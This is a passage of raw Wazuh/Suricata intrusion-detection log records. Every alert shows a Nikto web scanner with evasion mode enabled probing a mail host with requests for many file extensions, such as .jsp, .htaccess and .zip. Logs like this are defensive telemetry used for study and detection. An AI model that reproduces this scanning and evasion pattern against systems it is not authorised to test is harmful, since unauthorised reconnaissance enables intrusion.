character","id":"86601","firedtimes":33,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.55301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.420714+0000\",\"flow_id\":1.80732651702906e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47000,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.shtm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.420714+0000","flow_id":"1807326517029060.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47000","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.shtm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.434021+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":34,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.56845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.434021+0000\",\"flow_id\":243292701366920,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47004,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.it\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.434021+0000","flow_id":"243292701366920.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47004","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.it","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.439682+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":35,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.58379","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.439682+0000\",\"flow_id\":1495318617829748,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47006,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.INC\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.439682+0000","flow_id":"1495318617829748.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47006","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.INC","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.445037+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":36,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.59917","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.445037+0000\",\"flow_id\":429677102155680,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47008,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.445037+0000","flow_id":"429677102155680.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47008","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.449313+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":37,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.61453","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.449313+0000\",\"flow_id\":324562072555718,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47010,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htaccess\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.449313+0000","flow_id":"324562072555718.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47010","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htaccess","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.452773+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":38,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.62999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.452773+0000\",\"flow_id\":1849172383425421,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47012,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.notes\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.452773+0000","flow_id":"1849172383425421.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47012","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.notes","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.455975+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":39,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.64541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.455975+0000\",\"flow_id\":2160789440622614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47014,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.455975+0000","flow_id":"2160789440622614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47014","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.459533+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":40,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.66073","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.459533+0000\",\"flow_id\":124820323499370,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47016,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.snp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.459533+0000","flow_id":"124820323499370.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47016","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.snp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.462827+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":41,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.67609","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.462827+0000\",\"flow_id\":67126027750670,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47018,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.462827+0000","flow_id":"67126027750670.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47018","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.465956+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":42,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.69143","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.465956+0000\",\"flow_id\":1588798580987989,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47020,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.zip\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.465956+0000","flow_id":"1588798580987989.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47020","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.zip","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.468908+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":43,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.70681","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.468908+0000\",\"flow_id\":1790687813706853,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47022,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.txt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.468908+0000","flow_id":"1790687813706853.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47022","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.txt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.471834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":44,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.72219","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.471834+0000\",\"flow_id\":1467865186840382,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47024,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js0x70\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.471834+0000","flow_id":"1467865186840382.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47024","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js0x70","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.479014+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":45,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.73763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.479014+0000\",\"flow_id\":1815388170634565,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47026,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bas\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.479014+0000","flow_id":"1815388170634565.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47026","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bas","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.482231+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":46,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.75301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.482231+0000\",\"flow_id\":2.02973710348082e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47028,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.LCDispatcher\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.482231+0000","flow_id":"2029737103480820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47028","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.LCDispatcher","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.484832+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":47,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.76861","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.484832+0000\",\"flow_id\":1487763770335653,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47030,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.484832+0000","flow_id":"1487763770335653.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47030","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.490695+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":48,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.78399","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.490695+0000\",\"flow_id\":2040551831140588,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47032,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gz\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
